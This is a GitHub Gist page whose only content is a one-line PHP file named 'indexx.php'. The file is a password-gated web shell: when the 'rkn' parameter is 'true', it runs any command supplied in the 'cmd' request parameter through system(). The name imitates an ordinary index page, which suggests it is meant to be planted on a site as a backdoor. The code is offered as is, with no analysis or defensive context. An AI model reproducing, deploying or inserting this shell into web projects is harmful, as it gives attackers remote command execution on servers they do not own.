Skip to content

Instantly share code, notes, and snippets.

@atastycookie
Last active July 12, 2021 08:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save atastycookie/4e67214e0c7cdef9c0420ded4bc453ab to your computer and use it in GitHub Desktop.
Save atastycookie/4e67214e0c7cdef9c0420ded4bc453ab to your computer and use it in GitHub Desktop.
indexx.php
<?php if($_REQUEST['rkn'] != 'true') {die;}; if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; }?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment